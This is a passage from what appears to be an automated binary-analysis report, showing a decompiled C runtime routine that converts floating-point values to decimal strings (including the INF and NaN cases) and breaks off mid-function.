                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00393FF6 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODECrypto
                        Download Yara Rule
                        C-Code - Quality: 65%
                        			E00393FF6(void* __ebx, signed int __edx, void* __edi, void* __esi, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr* _a16, signed int _a20, intOrPtr _a24) {
				signed int _v8;
				char _v460;
				signed int _v464;
				void _v468;
				signed int _v472;
				signed int _v932;
				signed int _v936;
				signed int _v1392;
				signed int _v1396;
				signed int _v1400;
				char _v1860;
				signed int _v1864;
				signed int _v1865;
				signed int _v1872;
				signed int _v1876;
				signed int _v1880;
				signed int _v1884;
				signed int _v1888;
				signed int _v1892;
				signed int _v1896;
				intOrPtr _v1900;
				signed int _v1904;
				signed int _v1908;
				signed int _v1912;
				signed int _v1916;
				signed int _v1920;
				signed int _v1924;
				signed int _v1928;
				char _v1936;
				char _v1944;
				char _v2404;
				signed int _v2408;
				signed int* _v2436;
				signed int _t722;
				signed int _t732;
				signed int _t733;
				void* _t737;
				signed int _t741;
				signed int _t742;
				signed int _t748;
				signed int _t754;
				intOrPtr _t756;
				void* _t757;
				signed int _t758;
				signed int _t759;
				signed int _t760;
				signed int _t769;
				signed int _t774;
				signed int _t775;
				signed int _t776;
				signed int _t779;
				signed int _t780;
				signed int _t781;
				signed int _t783;
				signed int _t784;
				signed int _t785;
				signed int _t786;
				signed int _t791;
				signed int _t792;
				signed int _t798;
				signed int _t799;
				signed int _t802;
				signed int _t807;
				signed int _t815;
				signed int* _t818;
				signed int _t822;
				signed int _t833;
				signed int _t834;
				signed int _t836;
				char* _t837;
				signed int _t840;
				signed int _t844;
				signed int _t845;
				signed int _t850;
				signed int _t852;
				signed int _t857;
				signed int _t866;
				signed int _t869;
				signed int _t871;
				signed int _t874;
				signed int _t875;
				signed int _t876;
				signed int _t879;
				signed int _t892;
				signed int _t893;
				signed int _t895;
				char* _t896;
				signed int _t899;
				signed int _t903;
				signed int _t904;
				signed int* _t906;
				signed int _t909;
				signed int _t911;
				signed int _t916;
				signed int _t924;
				signed int _t927;
				signed int _t931;
				signed int* _t938;
				intOrPtr _t940;
				void* _t941;
				intOrPtr* _t943;
				signed int* _t947;
				unsigned int _t958;
				signed int _t959;
				void* _t962;
				signed int _t963;
				void* _t965;
				signed int _t966;
				signed int _t967;
				signed int _t968;
				signed int _t978;
				signed int _t983;
				signed int _t986;
				unsigned int _t989;
				signed int _t990;
				void* _t993;
				signed int _t994;
				void* _t996;
				signed int _t997;
				signed int _t998;
				signed int _t999;
				signed int _t1004;
				signed int* _t1009;
				signed int _t1011;
				signed int _t1021;
				void _t1024;
				signed int _t1027;
				void* _t1030;
				signed int* _t1037;
				signed int _t1042;
				signed int _t1043;
				signed int _t1046;
				signed int _t1047;
				signed int _t1049;
				signed int _t1050;
				signed int _t1051;
				signed int _t1055;
				signed int _t1059;
				signed int _t1060;
				signed int _t1061;
				signed int _t1063;
				signed int _t1064;
				signed int _t1065;
				signed int _t1066;
				signed int _t1067;
				signed int _t1068;
				signed int _t1070;
				signed int _t1071;
				signed int _t1072;
				signed int _t1073;
				signed int _t1074;
				signed int _t1075;
				unsigned int _t1076;
				void* _t1079;
				intOrPtr _t1081;
				signed int _t1082;
				signed int _t1083;
				signed int _t1084;
				signed int* _t1088;
				void* _t1092;
				void* _t1093;
				signed int _t1094;
				signed int _t1095;
				signed int _t1096;
				signed int _t1099;
				signed int _t1100;
				signed int _t1105;
				signed int _t1107;
				signed int _t1108;
				signed int _t1116;
				signed int _t1117;
				signed int _t1118;
				signed int _t1119;
				signed int _t1120;
				signed int _t1121;
				signed int _t1122;
				signed int _t1126;
				signed int _t1127;
				signed int _t1128;
				signed int _t1129;
				signed int _t1130;
				unsigned int _t1133;
				void* _t1137;
				void* _t1138;
				unsigned int _t1139;
				signed int _t1144;
				signed int _t1145;
				signed int _t1147;
				signed int _t1148;
				intOrPtr* _t1150;
				signed int _t1151;
				signed int _t1153;
				signed int _t1154;
				signed int _t1157;
				signed int _t1159;
				signed int _t1160;
				void* _t1161;
				signed int _t1162;
				signed int _t1163;
				signed int _t1164;
				void* _t1167;
				signed int _t1168;
				signed int _t1169;
				signed int _t1170;
				signed int _t1171;
				signed int _t1172;
				signed int* _t1175;
				signed int _t1176;
				signed int _t1177;
				signed int _t1178;
				signed int _t1179;
				intOrPtr* _t1181;
				intOrPtr* _t1182;
				signed int _t1184;
				signed int _t1186;
				signed int _t1189;
				signed int _t1195;
				signed int _t1199;
				void* _t1200;
				signed int _t1204;
				signed int _t1207;
				signed int _t1208;
				signed int _t1209;
				signed int _t1210;
				signed int _t1211;
				signed int _t1212;
				signed int _t1214;
				signed int _t1215;
				signed int _t1216;
				signed int _t1217;
				signed int _t1219;
				signed int _t1220;
				signed int _t1221;
				signed int _t1222;
				signed int _t1223;
				signed int _t1225;
				signed int _t1226;
				signed int _t1228;
				signed int _t1230;
				signed int _t1232;
				signed int _t1234;
				signed int* _t1237;
				signed int* _t1240;
				signed int _t1249;

				_t1107 = __edx;
				_t722 =  *0x3e1008; // 0x847b54ee
				_v8 = _t722 ^ _t1234;
				_t1021 = _a20;
				_push(__esi);
				_push(__edi);
				_t1150 = _a16;
				_v1924 = _t1150;
				_v1920 = _t1021;
				E00393FCC( &_v1944, __eflags);
				_t1199 = _a8;
				_t727 = 0x2d;
				if((_t1199 & 0x80000000) == 0) {
					_t727 = 0x120;
				}
				 *_t1150 = _t727;
				 *((intOrPtr*)(_t1150 + 8)) = _t1021;
				_t1151 = _a4;
				if((_t1199 & 0x7ff00000) != 0) {
					L5:
					_t732 = E0038E5BD( &_a4);
					_pop(_t1036);
					__eflags = _t732;
					if(_t732 != 0) {
						_t1036 = _v1924;
						 *((intOrPtr*)(_v1924 + 4)) = 1;
					}
					_t733 = _t732 - 1;
					__eflags = _t733;
					if(_t733 == 0) {
						_push("1#INF");
						goto L308;
					} else {
						_t741 = _t733 - 1;
						__eflags = _t741;
						if(_t741 == 0) {
							_push("1#QNAN");
							goto L308;
						} else {
							_t742 = _t741 - 1;
							__eflags = _t742;
							if(_t742 == 0) {
								_push("1#SNAN");
								goto L308;
							} else {
								__eflags = _t742 == 1;
								if(_t742 == 1) {
									_push("1#IND");
									goto L308;
								} else {
									_v1928 = _v1928 & 0x00000000;
									_a4 = _t1151;
									_a8 = _t1199 & 0x7fffffff;
									_t1249 = _a4;
									asm("fst qword [ebp-0x768]");
									_t1153 = _v1896;
									_v1916 = _a12 + 1;
									_t1042 = _t1153 >> 0x14;
									_t748 = _t1042 & 0x000007ff;
									__eflags = _t748;
									if(_t748 != 0) {
										_t1108 = 0;
										_t748 = 0;
										__eflags = 0;
									} else {
										_t1108 = 1;
									}
									_t1154 = _t1153 & 0x000fffff;
									_t1024 = _v1900 + _t748;
									asm("adc edi, esi");
									__eflags = _t1108;
									_t1043 = _t1042 & 0x000007ff;
									_t1204 = _t1043 - 0x434 + (0 | _t1108 != 0x00000000) + 1;
									_v1872 = _t1204;
									E00396280(_t1043, _t1249);
									_push(_t1043);
									_push(_t1043);
									 *_t1237 = _t1249;
									_t754 = E003982B0(E00396390(_t1154), _t1249);
									_v1904 = _t754;
									__eflags = _t754 - 0x7fffffff;
									if(_t754 == 0x7fffffff) {
										L16:
										__eflags = 0;
										_v1904 = 0;
									} else {
										__eflags = _t754 - 0x80000000;
										if(_t754 == 0x80000000) {
											goto L16;
										}
									}
									_v468 = _t1024;
									__eflags = _t1154;
									_v464 = _t1154;
									_t1027 = (0 | _t1154 != 0x00000000) + 1;
									_v472 = _t1027;
									__eflags = _t1204;
									if(_t1204 < 0) {
										__eflags = _t1204 - 0xfffffc02;
										if(_t1204 == 0xfffffc02) {
											L101:
											_t756 =  *((intOrPtr*)(_t1234 + _t1027 * 4 - 0x1d4));
											_t195 =  &_v1896;
											 *_t195 = _v1896 & 0x00000000;
											__eflags =  *_t195;
											asm("bsr eax, eax");
											if( *_t195 == 0) {
												_t1046 = 0;
												__eflags = 0;
											} else {
												_t1046 = _t756 + 1;
											}
											_t757 = 0x20;
											_t758 = _t757 - _t1046;
											__eflags = _t758 - 1;
											_t759 = _t758 & 0xffffff00 | _t758 - 0x00000001 > 0x00000000;
											__eflags = _t1027 - 0x73;
											_v1865 = _t759;
											_t1047 = _t1046 & 0xffffff00 | _t1027 - 0x00000073 > 0x00000000;
											__eflags = _t1027 - 0x73;
											if(_t1027 != 0x73) {
												L107:
												_t760 = 0;
												__eflags = 0;
											} else {
												__eflags = _t759;
												if(_t759 == 0) {
													goto L107;
												} else {
													_t760 = 1;
												}
											}
											__eflags = _t1047;
											if(_t1047 != 0) {
												L126:
												_v1400 = _v1400 & 0x00000000;
												_t224 =  &_v472;
												 *_t224 = _v472 & 0x00000000;
												__eflags =  *_t224;
												E0039034E( &_v468, 0x1cc,  &_v1396, 0);
												_t1237 =  &(_t1237[4]);
											} else {
												__eflags = _t760;
												if(_t760 != 0) {
													goto L126;
												} else {
													_t1074 = 0x72;
													__eflags = _t1027 - _t1074;
													if(_t1027 < _t1074) {
														_t1074 = _t1027;
													}
													__eflags = _t1074 - 0xffffffff;
													if(_t1074 != 0xffffffff) {
														_t1222 = _t1074;
														_t1181 =  &_v468 + _t1074 * 4;
														_v1880 = _t1181;
														while(1) {
															__eflags = _t1222 - _t1027;
															if(_t1222 >= _t1027) {
																_t208 =  &_v1876;
																 *_t208 = _v1876 & 0x00000000;
																__eflags =  *_t208;
															} else {
																_v1876 =  *_t1181;
															}
															_t210 = _t1222 - 1; // 0x70
															__eflags = _t210 - _t1027;
															if(_t210 >= _t1027) {
																_t1133 = 0;
																__eflags = 0;
															} else {
																_t1133 =  *(_t1181 - 4);
															}
															_t1181 = _t1181 - 4;
															_t938 = _v1880;
															_t1222 = _t1222 - 1;
															 *_t938 = _t1133 >> 0x0000001f ^ _v1876 + _v1876;
															_v1880 = _t938 - 4;
															__eflags = _t1222 - 0xffffffff;
															if(_t1222 == 0xffffffff) {
																break;
															}
															_t1027 = _v472;
														}
														_t1204 = _v1872;
													}
													__eflags = _v1865;
													if(_v1865 == 0) {
														_v472 = _t1074;
													} else {
														_t218 = _t1074 + 1; // 0x73
														_v472 = _t218;
													}
												}
											}
											_t1157 = 1 - _t1204;
											E0037E1A0(_t1157,  &_v1396, 0, 1);
											__eflags = 1;
											 *(_t1234 + 0xbad63d) = 1 << (_t1157 & 0x0000001f);
											_t769 = 0xbadbae;
										} else {
											_v1396 = _v1396 & 0x00000000;
											_t1075 = 2;
											_v1392 = 0x100000;
											_v1400 = _t1075;
											__eflags = _t1027 - _t1075;
											if(_t1027 == _t1075) {
												_t1137 = 0;
												__eflags = 0;
												while(1) {
													_t940 =  *((intOrPtr*)(_t1234 + _t1137 - 0x570));
													__eflags = _t940 -  *((intOrPtr*)(_t1234 + _t1137 - 0x1d0));
													if(_t940 !=  *((intOrPtr*)(_t1234 + _t1137 - 0x1d0))) {
														goto L101;
													}
													_t1137 = _t1137 + 4;
													__eflags = _t1137 - 8;
													if(_t1137 != 8) {
														continue;
													} else {
														_t166 =  &_v1896;
														 *_t166 = _v1896 & 0x00000000;
														__eflags =  *_t166;
														asm("bsr eax, edi");
														if( *_t166 == 0) {
															_t1138 = 0;
															__eflags = 0;
														} else {
															_t1138 = _t940 + 1;
														}
														_t941 = 0x20;
														_t1223 = _t1075;
														__eflags = _t941 - _t1138 - _t1075;
														_t943 =  &_v460;
														_v1880 = _t943;
														_t1182 = _t943;
														_t171 =  &_v1865;
														 *_t171 = _t941 - _t1138 - _t1075 > 0;
														__eflags =  *_t171;
														while(1) {
															__eflags = _t1223 - _t1027;
															if(_t1223 >= _t1027) {
																_t173 =  &_v1876;
																 *_t173 = _v1876 & 0x00000000;
																__eflags =  *_t173;
															} else {
																_v1876 =  *_t1182;
															}
															_t175 = _t1223 - 1; // 0x0
															__eflags = _t175 - _t1027;
															if(_t175 >= _t1027) {
																_t1139 = 0;
																__eflags = 0;
															} else {
																_t1139 =  *(_t1182 - 4);
															}
															_t1182 = _t1182 - 4;
															_t947 = _v1880;
															_t1223 = _t1223 - 1;
															 *_t947 = _t1139 >> 0x0000001e ^ _v1876 << 0x00000002;
															_v1880 = _t947 - 4;
															__eflags = _t1223 - 0xffffffff;
															if(_t1223 == 0xffffffff) {
																break;
															}
															_t1027 = _v472;
														}
														__eflags = _v1865;
														_t1076 = _t1075 - _v1872;
														_v472 = (0 | _v1865 != 0x00000000) + _t1075;
														_t1184 = _t1076 >> 5;
														_v1884 = _t1076;
														_t1225 = _t1184 << 2;
														E0037E1A0(_t1184,  &_v1396, 0, _t1225);
														 *(_t1234 + _t1225 - 0x570) = 1 << (_v1884 & 0x0000001f);
														_t769 = _t1184 + 1;
													}
													goto L128;
												}
											}
											goto L101;
										}
										L128:
										_v1400 = _t769;
										_t1030 = 0x1cc;
										_v936 = _t769;
										__eflags = _t769 << 2;
										E0039034E( &_v932, 0x1cc,  &_v1396, _t769 << 2);
										_t1240 =  &(_t1237[7]);
									} else {
										_v1396 = _v1396 & 0x00000000;
										_t1226 = 2;
										_v1392 = 0x100000;
										_v1400 = _t1226;
										__eflags = _t1027 - _t1226;
										if(_t1027 != _t1226) {
											L53:
											_t958 = _v1872 + 1;
											_t959 = _t958 & 0x0000001f;
											_t1079 = 0x20;
											_v1876 = _t959;
											_t1186 = _t958 >> 5;
											_v1872 = _t1186;
											_v1908 = _t1079 - _t959;
											_t962 = E003981D0(1, _t1079 - _t959, 0);
											_t1081 =  *((intOrPtr*)(_t1234 + _t1027 * 4 - 0x1d4));
											_t963 = _t962 - 1;
											_t108 =  &_v1896;
											 *_t108 = _v1896 & 0x00000000;
											__eflags =  *_t108;
											asm("bsr ecx, ecx");
											_v1884 = _t963;
											_v1912 =  !_t963;
											if( *_t108 == 0) {
												_t1082 = 0;
												__eflags = 0;
											} else {
												_t1082 = _t1081 + 1;
											}
											_t965 = 0x20;
											_t966 = _t965 - _t1082;
											_t1144 = _t1027 + _t1186;
											__eflags = _v1876 - _t966;
											_v1892 = _t1144;
											_t967 = _t966 & 0xffffff00 | _v1876 - _t966 > 0x00000000;
											__eflags = _t1144 - 0x73;
											_v1865 = _t967;
											_t1083 = _t1082 & 0xffffff00 | _t1144 - 0x00000073 > 0x00000000;
											__eflags = _t1144 - 0x73;
											if(_t1144 != 0x73) {
												L59:
												_t968 = 0;
												__eflags = 0;
											} else {
												__eflags = _t967;
												if(_t967 == 0) {
													goto L59;
												} else {
													_t968 = 1;
												}
											}
											__eflags = _t1083;
											if(_t1083 != 0) {
												L81:
												__eflags = 0;
												_t1030 = 0x1cc;
												_v1400 = 0;
												_v472 = 0;
												E0039034E( &_v468, 0x1cc,  &_v1396, 0);
												_t1237 =  &(_t1237[4]);
											} else {
												__eflags = _t968;
												if(_t968 != 0) {
													goto L81;
												} else {
													_t1084 = 0x72;
													__eflags = _t1144 - _t1084;
													if(_t1144 >= _t1084) {
														_t1144 = _t1084;
														_v1892 = _t1084;
													}
													_t978 = _t1144;
													_v1880 = _t978;
													__eflags = _t1144 - 0xffffffff;
													if(_t1144 != 0xffffffff) {
														_t1145 = _v1872;
														_t1228 = _t1144 - _t1145;
														__eflags = _t1228;
														_t1088 =  &_v468 + _t1228 * 4;
														_v1888 = _t1088;
														while(1) {
															__eflags = _t978 - _t1145;
															if(_t978 < _t1145) {
																break;
															}
															__eflags = _t1228 - _t1027;
															if(_t1228 >= _t1027) {
																_t1189 = 0;
																__eflags = 0;
															} else {
																_t1189 =  *_t1088;
															}
															__eflags = _t1228 - 1 - _t1027;
															if(_t1228 - 1 >= _t1027) {
																_t983 = 0;
																__eflags = 0;
															} else {
																_t983 =  *(_t1088 - 4);
															}
															_t986 = _v1880;
															_t1088 = _v1888 - 4;
															_v1888 = _t1088;
															 *(_t1234 + _t986 * 4 - 0x1d0) = (_t1189 & _v1884) << _v1876 | (_t983 & _v1912) >> _v1908;
															_t978 = _t986 - 1;
															_t1228 = _t1228 - 1;
															_v1880 = _t978;
															__eflags = _t978 - 0xffffffff;
															if(_t978 != 0xffffffff) {
																_t1027 = _v472;
																continue;
															}
															break;
														}
														_t1144 = _v1892;
														_t1186 = _v1872;
														_t1226 = 2;
													}
													__eflags = _t1186;
													if(_t1186 != 0) {
														__eflags = 0;
														memset( &_v468, 0, _t1186 << 2);
														_t1237 =  &(_t1237[3]);
													}
													__eflags = _v1865;
													_t1030 = 0x1cc;
													if(_v1865 == 0) {
														_v472 = _t1144;
													} else {
														_v472 = _t1144 + 1;
													}
												}
											}
											_v1392 = _v1392 & 0x00000000;
											_v1396 = _t1226;
											_v1400 = 1;
											_v936 = 1;
											_push(4);
										} else {
											_t1092 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *((intOrPtr*)(_t1234 + _t1092 - 0x570)) -  *((intOrPtr*)(_t1234 + _t1092 - 0x1d0));
												if( *((intOrPtr*)(_t1234 + _t1092 - 0x570)) !=  *((intOrPtr*)(_t1234 + _t1092 - 0x1d0))) {
													goto L53;
												}
												_t1092 = _t1092 + 4;
												__eflags = _t1092 - 8;
												if(_t1092 != 8) {
													continue;
												} else {
													_t989 = _v1872 + 2;
													_t990 = _t989 & 0x0000001f;
													_t1093 = 0x20;
													_t1094 = _t1093 - _t990;
													_v1888 = _t990;
													_t1230 = _t989 >> 5;
													_v1876 = _t1230;
													_v1908 = _t1094;
													_t993 = E003981D0(1, _t1094, 0);
													_v1896 = _v1896 & 0x00000000;
													_t994 = _t993 - 1;
													__eflags = _t994;
													asm("bsr ecx, edi");
													_v1884 = _t994;
													_v1912 =  !_t994;
													if(_t994 == 0) {
														_t1095 = 0;
														__eflags = 0;
													} else {
														_t1095 = _t1094 + 1;
													}
													_t996 = 0x20;
													_t997 = _t996 - _t1095;
													_t1147 = _t1230 + 2;
													__eflags = _v1888 - _t997;
													_v1880 = _t1147;
													_t998 = _t997 & 0xffffff00 | _v1888 - _t997 > 0x00000000;
													__eflags = _t1147 - 0x73;
													_v1865 = _t998;
													_t1096 = _t1095 & 0xffffff00 | _t1147 - 0x00000073 > 0x00000000;
													__eflags = _t1147 - 0x73;
													if(_t1147 != 0x73) {
														L28:
														_t999 = 0;
														__eflags = 0;
													} else {
														__eflags = _t998;
														if(_t998 == 0) {
															goto L28;
														} else {
															_t999 = 1;
														}
													}
													__eflags = _t1096;
													if(_t1096 != 0) {
														L50:
														__eflags = 0;
														_t1030 = 0x1cc;
														_v1400 = 0;
														_v472 = 0;
														E0039034E( &_v468, 0x1cc,  &_v1396, 0);
														_t1237 =  &(_t1237[4]);
													} else {
														__eflags = _t999;
														if(_t999 != 0) {
															goto L50;
														} else {
															_t1099 = 0x72;
															__eflags = _t1147 - _t1099;
															if(_t1147 >= _t1099) {
																_t1147 = _t1099;
																_v1880 = _t1099;
															}
															_t1100 = _t1147;
															_v1892 = _t1100;
															__eflags = _t1147 - 0xffffffff;
															if(_t1147 != 0xffffffff) {
																_t1148 = _v1876;
																_t1232 = _t1147 - _t1148;
																__eflags = _t1232;
																_t1009 =  &_v468 + _t1232 * 4;
																_v1872 = _t1009;
																while(1) {
																	__eflags = _t1100 - _t1148;
																	if(_t1100 < _t1148) {
																		break;
																	}
																	__eflags = _t1232 - _t1027;
																	if(_t1232 >= _t1027) {
																		_t1195 = 0;
																		__eflags = 0;
																	} else {
																		_t1195 =  *_t1009;
																	}
																	__eflags = _t1232 - 1 - _t1027;
																	if(_t1232 - 1 >= _t1027) {
																		_t1011 = 0;
																		__eflags = 0;
																	} else {
																		_t1011 =  *(_v1872 - 4);
																	}
																	_t1105 = _v1892;
																	 *(_t1234 + _t1105 * 4 - 0x1d0) = (_t1011 & _v1912) >> _v1908 | (_t1195 & _v1884) << _v1888;
																	_t1100 = _t1105 - 1;
																	_t1232 = _t1232 - 1;
																	_t1009 = _v1872 - 4;
																	_v1892 = _t1100;
																	_v1872 = _t1009;
																	__eflags = _t1100 - 0xffffffff;
																	if(_t1100 != 0xffffffff) {
																		_t1027 = _v472;
																		continue;
																	}
																	break;
																}
																_t1147 = _v1880;
																_t1230 = _v1876;
															}
															__eflags = _t1230;
															if(_t1230 != 0) {
																__eflags = 0;
																memset( &_v468, 0, _t1230 << 2);
																_t1237 =  &(_t1237[3]);
															}
															__eflags = _v1865;
															_t1030 = 0x1cc;
															if(_v1865 == 0) {
																_v472 = _t1147;
															} else {
																_v472 = _t1147 + 1;
															}
														}
													}
													_v1392 = _v1392 & 0x00000000;
													_t1004 = 4;
													__eflags = 1;
													_v1396 = _t1004;
													_v1400 = 1;
													_v936 = 1;
													_push(_t1004);
												}
												goto L52;
											}
											goto L53;
										}
										L52:
										_push( &_v1396);
										_push(_t1030);
										_push( &_v932);
										E0039034E();
										_t1240 =  &(_t1237[4]);
									}
									_t774 = _v1904;
									_t1049 = 0xa;
									_v1912 = _t1049;
									__eflags = _t774;
									if(_t774 < 0) {
										_t775 =  ~_t774;
										_t776 = _t775 / _t1049;
										_v1880 = _t776;
										_t1050 = _t775 % _t1049;
										_v1884 = _t1050;
										__eflags = _t776;
										if(_t776 == 0) {
											L249:
											__eflags = _t1050;
											if(_t1050 != 0) {
												_t815 =  *(0x3ce874 + _t1050 * 4);
												_v1896 = _t815;
												__eflags = _t815;
												if(_t815 == 0) {
													L260:
													__eflags = 0;
													_push(0);
													_v472 = 0;
													_v2408 = 0;
													goto L261;
												} else {
													__eflags = _t815 - 1;
													if(_t815 != 1) {
														_t1061 = _v472;
														__eflags = _t1061;
														if(_t1061 != 0) {
															_t1164 = 0;
															_t1212 = 0;
															__eflags = 0;
															do {
																_t1118 = _t815 *  *(_t1234 + _t1212 * 4 - 0x1d0) >> 0x20;
																 *(_t1234 + _t1212 * 4 - 0x1d0) = _t815 *  *(_t1234 + _t1212 * 4 - 0x1d0) + _t1164;
																_t815 = _v1896;
																asm("adc edx, 0x0");
																_t1212 = _t1212 + 1;
																_t1164 = _t1118;
																__eflags = _t1212 - _t1061;
															} while (_t1212 != _t1061);
															__eflags = _t1164;
															if(_t1164 != 0) {
																_t822 = _v472;
																__eflags = _t822 - 0x73;
																if(_t822 >= 0x73) {
																	goto L260;
																} else {
																	 *(_t1234 + _t822 * 4 - 0x1d0) = _t1164;
																	_v472 = _v472 + 1;
																}
															}
														}
													}
												}
											}
										} else {
											do {
												__eflags = _t776 - 0x26;
												if(_t776 > 0x26) {
													_t776 = 0x26;
												}
												_t1062 =  *(0x3ce7de + _t776 * 4) & 0x000000ff;
												_v1872 = _t776;
												_v1400 = ( *(0x3ce7de + _t776 * 4) & 0x000000ff) + ( *(0x3ce7df + _t776 * 4) & 0x000000ff);
												E0037E1A0(_t1062 << 2,  &_v1396, 0, _t1062 << 2);
												_t833 = E0037E340( &(( &_v1396)[_t1062]), 0x3cded8 + ( *(0x3ce7dc + _v1872 * 4) & 0x0000ffff) * 4, ( *(0x3ce7df + _t776 * 4) & 0x000000ff) << 2);
												_t1063 = _v1400;
												_t1240 =  &(_t1240[6]);
												_v1892 = _t1063;
												__eflags = _t1063 - 1;
												if(_t1063 > 1) {
													__eflags = _v472 - 1;
													if(_v472 > 1) {
														__eflags = _t1063 - _v472;
														_t1167 =  &_v1396;
														_t834 = _t833 & 0xffffff00 | _t1063 - _v472 > 0x00000000;
														__eflags = _t834;
														if(_t834 != 0) {
															_t1119 =  &_v468;
														} else {
															_t1167 =  &_v468;
															_t1119 =  &_v1396;
														}
														_v1908 = _t1119;
														__eflags = _t834;
														if(_t834 == 0) {
															_t1063 = _v472;
														}
														_v1876 = _t1063;
														__eflags = _t834;
														if(_t834 != 0) {
															_v1892 = _v472;
														}
														_t1120 = 0;
														_t1214 = 0;
														_v1864 = 0;
														__eflags = _t1063;
														if(_t1063 == 0) {
															L243:
															_v472 = _t1120;
															_t836 = _t1120 << 2;
															__eflags = _t836;
															_push(_t836);
															_t837 =  &_v1860;
															goto L244;
														} else {
															_t1168 = _t1167 -  &_v1860;
															__eflags = _t1168;
															_v1928 = _t1168;
															do {
																_t844 =  *(_t1234 + _t1168 + _t1214 * 4 - 0x740);
																_v1896 = _t844;
																__eflags = _t844;
																if(_t844 != 0) {
																	_t845 = 0;
																	_t1169 = 0;
																	_t1064 = _t1214;
																	_v1888 = 0;
																	__eflags = _v1892;
																	if(_v1892 == 0) {
																		L240:
																		__eflags = _t1064 - 0x73;
																		if(_t1064 == 0x73) {
																			goto L258;
																		} else {
																			_t1168 = _v1928;
																			_t1063 = _v1876;
																			goto L242;
																		}
																	} else {
																		while(1) {
																			__eflags = _t1064 - 0x73;
																			if(_t1064 == 0x73) {
																				goto L235;
																			}
																			__eflags = _t1064 - _t1120;
																			if(_t1064 == _t1120) {
																				 *(_t1234 + _t1064 * 4 - 0x740) =  *(_t1234 + _t1064 * 4 - 0x740) & 0x00000000;
																				_t857 = _t845 + 1 + _t1214;
																				__eflags = _t857;
																				_v1864 = _t857;
																				_t845 = _v1888;
																			}
																			_t852 =  *(_v1908 + _t845 * 4);
																			asm("adc edx, 0x0");
																			 *(_t1234 + _t1064 * 4 - 0x740) =  *(_t1234 + _t1064 * 4 - 0x740) + _t852 * _v1896 + _t1169;
																			asm("adc edx, 0x0");
																			_t845 = _v1888 + 1;
																			_t1064 = _t1064 + 1;
																			_v1888 = _t845;
																			_t1169 = _t852 * _v1896 >> 0x20;
																			_t1120 = _v1864;
																			__eflags = _t845 - _v1892;
																			if(_t845 != _v1892) {
																				continue;
																			} else {
																				goto L235;
																			}
																			while(1) {
																				L235:
																				__eflags = _t1169;
																				if(_t1169 == 0) {
																					goto L240;
																				}
																				__eflags = _t1064 - 0x73;
																				if(_t1064 == 0x73) {
																					goto L258;
																				} else {
																					__eflags = _t1064 - _t1120;
																					if(_t1064 == _t1120) {
																						_t558 = _t1234 + _t1064 * 4 - 0x740;
																						 *_t558 =  *(_t1234 + _t1064 * 4 - 0x740) & 0x00000000;
																						__eflags =  *_t558;
																						_t564 = _t1064 + 1; // 0x1
																						_v1864 = _t564;
																					}
																					_t850 = _t1169;
																					_t1169 = 0;
																					 *(_t1234 + _t1064 * 4 - 0x740) =  *(_t1234 + _t1064 * 4 - 0x740) + _t850;
																					_t1120 = _v1864;
																					asm("adc edi, edi");
																					_t1064 = _t1064 + 1;
																					continue;
																				}
																				goto L246;
																			}
																			goto L240;
																		}
																		goto L235;
																	}
																} else {
																	__eflags = _t1214 - _t1120;
																	if(_t1214 == _t1120) {
																		 *(_t1234 + _t1214 * 4 - 0x740) =  *(_t1234 + _t1214 * 4 - 0x740) & _t844;
																		_t526 = _t1214 + 1; // 0x1
																		_t1120 = _t526;
																		_v1864 = _t1120;
																	}
																	goto L242;
																}
																goto L246;
																L242:
																_t1214 = _t1214 + 1;
																__eflags = _t1214 - _t1063;
															} while (_t1214 != _t1063);
															goto L243;
														}
													} else {
														_t1170 = _v468;
														_v472 = _t1063;
														E0039034E( &_v468, _t1030,  &_v1396, _t1063 << 2);
														_t1240 =  &(_t1240[4]);
														__eflags = _t1170;
														if(_t1170 == 0) {
															goto L203;
														} else {
															__eflags = _t1170 - 1;
															if(_t1170 == 1) {
																goto L245;
															} else {
																__eflags = _v472;
																if(_v472 == 0) {
																	goto L245;
																} else {
																	_t1065 = 0;
																	_v1896 = _v472;
																	_t1215 = 0;
																	__eflags = 0;
																	do {
																		_t866 = _t1170;
																		_t1121 = _t866 *  *(_t1234 + _t1215 * 4 - 0x1d0) >> 0x20;
																		 *(_t1234 + _t1215 * 4 - 0x1d0) = _t866 *  *(_t1234 + _t1215 * 4 - 0x1d0) + _t1065;
																		asm("adc edx, 0x0");
																		_t1215 = _t1215 + 1;
																		_t1065 = _t1121;
																		__eflags = _t1215 - _v1896;
																	} while (_t1215 != _v1896);
																	goto L208;
																}
															}
														}
													}
												} else {
													_t1171 = _v1396;
													__eflags = _t1171;
													if(_t1171 != 0) {
														__eflags = _t1171 - 1;
														if(_t1171 == 1) {
															goto L245;
														} else {
															__eflags = _v472;
															if(_v472 == 0) {
																goto L245;
															} else {
																_t1066 = 0;
																_v1896 = _v472;
																_t1216 = 0;
																__eflags = 0;
																do {
																	_t871 = _t1171;
																	_t1122 = _t871 *  *(_t1234 + _t1216 * 4 - 0x1d0) >> 0x20;
																	 *(_t1234 + _t1216 * 4 - 0x1d0) = _t871 *  *(_t1234 + _t1216 * 4 - 0x1d0) + _t1066;
																	asm("adc edx, 0x0");
																	_t1216 = _t1216 + 1;
																	_t1066 = _t1122;
																	__eflags = _t1216 - _v1896;
																} while (_t1216 != _v1896);
																L208:
																__eflags = _t1065;
																if(_t1065 == 0) {
																	goto L245;
																} else {
																	_t869 = _v472;
																	__eflags = _t869 - 0x73;
																	if(_t869 >= 0x73) {
																		L258:
																		_v2408 = 0;
																		_v472 = 0;
																		E0039034E( &_v468, _t1030,  &_v2404, 0);
																		_t1240 =  &(_t1240[4]);
																		_t840 = 0;
																	} else {
																		 *(_t1234 + _t869 * 4 - 0x1d0) = _t1065;
																		_v472 = _v472 + 1;
																		goto L245;
																	}
																}
															}
														}
													} else {
														L203:
														_v2408 = 0;
														_v472 = 0;
														_push(0);
														_t837 =  &_v2404;
														L244:
														_push(_t837);
														_push(_t1030);
														_push( &_v468);
														E0039034E();
														_t1240 =  &(_t1240[4]);
														L245:
														_t840 = 1;
													}
												}
												L246:
												__eflags = _t840;
												if(_t840 == 0) {
													_v2408 = _v2408 & 0x00000000;
													_v472 = _v472 & 0x00000000;
													_push(0);
													L261:
													_push( &_v2404);
													_t818 =  &_v468;
													goto L262;
												} else {
													goto L247;
												}
												goto L263;
												L247:
												_t776 = _v1880 - _v1872;
												__eflags = _t776;
												_v1880 = _t776;
											} while (_t776 != 0);
											_t1050 = _v1884;
